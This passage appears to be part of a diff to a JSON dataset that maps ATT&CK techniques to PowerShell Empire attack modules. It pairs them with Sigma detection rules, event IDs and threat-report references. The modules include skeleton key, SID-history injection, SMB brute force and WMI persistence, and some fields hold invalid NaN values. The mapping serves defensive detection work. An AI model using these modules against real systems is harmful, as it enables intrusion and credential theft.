This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + } + ], + "external_reference": [ + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + null + ] + }, + { + "technique_id": "T1099", + "command_list": [ + "powershell/management/timestomp" + ], + "commands": [ + { + "command": "powershell/management/timestomp", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/management/timestomp", + "ATT&CK Technique #1": "T1099", + "ATT&CK Technique #2": "", + "Technique": "Timestomp", + "Concatenate 
for Python Dictionary": "\"powershell/management/timestomp\": [\"T1099\"]," + } + ], + "queries": [], + "possible_detections": [ + { + "title": "Unauthorized System Time Modification", + "id": "faa031b5-21ed-4e02-8881-2591f98d82ed", + "status": "experimental", + "description": "Detect scenarios where a potentially unauthorized application or user is modifying the system time.", + "author": "@neu5ron", + "references": [ + "Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)", + "Live environment caused by malware" + ], + "date": "2019/02/05", + "tags": [ + "attack.defense_evasion", + "attack.t1099" + ], + "logsource": { + "product": "windows", + "service": "security", + "definition": "Requirements: Audit Policy : System > Audit Security State Change, Group Policy : Computer Configuration\\Windows Settings\\Security Settings\\Advanced Audit Policy Configuration\\Audit Policies\\System\\Audit Security State Change" + }, + "detection": { + "selection": { + "EventID": 4616 + }, + "filter1": { + "ProcessName": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe" + }, + "filter2": { + "ProcessName": "C:\\Windows\\System32\\VBoxService.exe" + }, + "filter3": { + "ProcessName": "C:\\Windows\\System32\\svchost.exe", + "SubjectUserSid": "S-1-5-19" + }, + "condition": "selection and not ( filter1 or filter2 or filter3 )" + }, + "falsepositives": [ + "HyperV or other virtualization technologies with binary not listed in filter portion of detection" + ], + "level": "high" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ] + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + 
"https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf" + ] + }, + { + "technique_id": "T1178", + "command_list": [ + "powershell/persistence/misc/add_sid_history" + ], + "commands": [ + { + "command": "powershell/persistence/misc/add_sid_history", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/persistence/misc/add_sid_history", + "ATT&CK Technique #1": "T1178", + "ATT&CK Technique #2": "", + "Technique": "SID-History Injection", + "Concatenate for Python Dictionary": "\"powershell/persistence/misc/add_sid_history\": [\"T1178\"]," + } + ], + "queries": [], + "possible_detections": [ + { + "title": "Addition of SID History to Active Directory Object", + "id": "2632954e-db1c-49cb-9936-67d1ef1d17d2", + "status": "stable", + "description": "An attacker can use the SID history attribute to gain additional privileges.", + "references": [ + "https://adsecurity.org/?p=1772" + ], + "author": "Thomas Patzke, @atc_project (improvements)", + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1178" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection1": { + "EventID": [ + 4765, + 4766 
+ ] + }, + "selection2": { + "EventID": 4738 + }, + "selection3": { + "SidHistory": [ + "-", + "%%1793" + ] + }, + "condition": "selection1 or (selection2 and not selection3)" + }, + "falsepositives": [ + "Migration of an account into a new domain" + ], + "level": "medium" + }, + [ + "4624", + " 4625", + "Authentication logs" + ], + [ + "Windows event logs" + ], + [ + "API monitoring" + ], + [ + "4624", + " 4625", + "Authentication logs" + ], + [ + "Windows event logs" + ], + [ + "API monitoring" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1108", + "command_list": [ + "powershell/persistence/misc/skeleton_key", + "powershell/persistence/powerbreach/deaduser", + "powershell/persistence/powerbreach/eventlog", + "powershell/persistence/powerbreach/resolver" + ], + "commands": [ + { + "command": "powershell/persistence/misc/skeleton_key", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/persistence/powerbreach/deaduser", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/persistence/powerbreach/eventlog", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/persistence/powerbreach/resolver", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/persistence/misc/skeleton_key", + "ATT&CK Technique #1": "T1108", + "ATT&CK Technique #2": "", + "Technique": "Redundant Access", + "Concatenate for Python Dictionary": "\"powershell/persistence/misc/skeleton_key\": [\"T1108\"]," + }, + { + "Empire Module": "powershell/persistence/powerbreach/deaduser", + "ATT&CK Technique #1": 
"T1108", + "ATT&CK Technique #2": "", + "Technique": "Redundant Access", + "Concatenate for Python Dictionary": "\"powershell/persistence/powerbreach/deaduser\": [\"T1108\"]," + }, + { + "Empire Module": "powershell/persistence/powerbreach/eventlog", + "ATT&CK Technique #1": "T1108", + "ATT&CK Technique #2": "", + "Technique": "Redundant Access", + "Concatenate for Python Dictionary": "\"powershell/persistence/powerbreach/eventlog\": [\"T1108\"]," + }, + { + "Empire Module": "powershell/persistence/powerbreach/resolver", + "ATT&CK Technique #1": "T1108", + "ATT&CK Technique #2": "", + "Technique": "Redundant Access", + "Concatenate for Python Dictionary": "\"powershell/persistence/powerbreach/resolver\": [\"T1108\"]," + } + ], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4663", + "File monitoring" + ], + [ + "Login - 4624", + "Auth Logs" + ], + [ + "LMD - B9", + "Binary file metadata" + ], + [ + "Network protocol analysis" + ], + [ + "Packet capture" + ], + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4663", + "File monitoring" + ], + [ + "Login - 4624", + "Auth Logs" + ], + [ + "LOG-MD - B9", + "Binary file metadata" + ], + [ + "Network protocol analysis" + ], + [ + "Packet capture" + ], + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [ + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east", + "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf", + "https://www.youtube.com/watch?v=fevGZs0EQu8", + "https://pan-unit42.github.io/playbook_viewer/", + "https://www.secureworks.com/research/bronze-union", + "https://www.group-ib.com/blog/cobalt", + 
"https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/", NaN + ] + }, + { + "technique_id": "T1023", + "command_list": [ + "powershell/persistence/userland/backdoor_lnk" + ], + "commands": [ + { + "command": "powershell/persistence/userland/backdoor_lnk", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/persistence/userland/backdoor_lnk", + "ATT&CK Technique #1": "T1023", + "ATT&CK Technique #2": "", + "Technique": "Shortcut Modification", + "Concatenate for Python Dictionary": "\"powershell/persistence/userland/backdoor_lnk\": [\"T1023\"]," + } + ], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4663", + "File monitoring" + ] + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://securelist.com/darkhotels-attacks-in-2015/71713/", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + 
"https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + ] + }, + { + "technique_id": "T1110", + "command_list": [ + "powershell/recon/get_sql_server_login_default_pw", + "powershell/recon/http_login", + "powershell/situational_awareness/network/smbautobrute", + "powershell/situational_awareness/network/smbscanner" + ], + "commands": [ + { + "command": "powershell/recon/get_sql_server_login_default_pw", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/recon/http_login", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/smbautobrute", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/smbscanner", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/recon/get_sql_server_login_default_pw", + "ATT&CK Technique #1": "T1110", + "ATT&CK Technique #2": "", + "Technique": "Brute Force", + "Concatenate for Python Dictionary": "\"powershell/recon/get_sql_server_login_default_pw\": [\"T1110\"]," + }, + { + "Empire Module": "powershell/recon/http_login", + "ATT&CK Technique #1": "T1110", + "ATT&CK Technique #2": "", + "Technique": "Brute Force", + "Concatenate for Python Dictionary": "\"powershell/recon/http_login\": [\"T1110\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/smbautobrute", + "ATT&CK Technique #1": "T1110", + "ATT&CK Technique #2": "", + "Technique": "Brute Force", + "Concatenate for Python Dictionary": 
"\"powershell/situational_awareness/network/smbautobrute\": [\"T1110\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/smbscanner", + "ATT&CK Technique #1": "T1110", + "ATT&CK Technique #2": "", + "Technique": "Brute Force", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/smbscanner\": [\"T1110\"]," + } + ], + "queries": [], + "possible_detections": [ + "/var/log/secure", + [ + "4624", + "Authentication logs" + ], + [ + "4624", + "Authentication logs" + ], + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east", + 
"https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east", + "https://securelist.com/the-epic-turla-operation/65545/", + "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf", + "https://tools.kali.org/password-attacks/hydra", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1213", + "command_list": [ + "powershell/situational_awareness/host/findtrusteddocuments" + ], + "commands": [ + { + "command": "powershell/situational_awareness/host/findtrusteddocuments", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/situational_awareness/host/findtrusteddocuments", + "ATT&CK Technique #1": "T1213", + "ATT&CK Technique #2": "", + "Technique": "Data from Information Repositories", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/host/findtrusteddocuments\": [\"T1213\"]," + } + ], + "queries": [], + "possible_detections": [ + [ + "Application Logs" + ], + [ + "Authentication logs" + ], + [ + "Data loss prevention" + ], + [ + "Third-party application logs" + ], + [ + "Application Logs" + ], + [ + "4624", + "Authentication logs" + ], + [ + "Data loss prevention" + ], + [ + "Third-party application logs" + ], + { + "data_source": 
"logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", 
+ "target_data_element": "port" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + "https://www.justice.gov/file/1080281/download", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1084", + "command_list": [ + "powershell/persistence/elevated/wmi_updater" + ], + "commands": [ + { + "command": "powershell/persistence/elevated/wmi_updater", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/persistence/elevated/wmi_updater", + "ATT&CK Technique #1": "T1084", + "ATT&CK Technique #2": "", + "Technique": "Windows Management Instrumentation Event Subscription", + "Concatenate for Python Dictionary": "\"powershell/persistence/elevated/wmi_updater\": [\"T1084\"]," + } + ], + "queries": [], + "possible_detections": [ + { + "title": "WMI Event Subscription", + "id": "0f06a3a5-6a09-413f-8743-e6cf35561297", + "status": "experimental", + "description": "Detects creation of WMI event subscription persistence method", + "references": [ + 
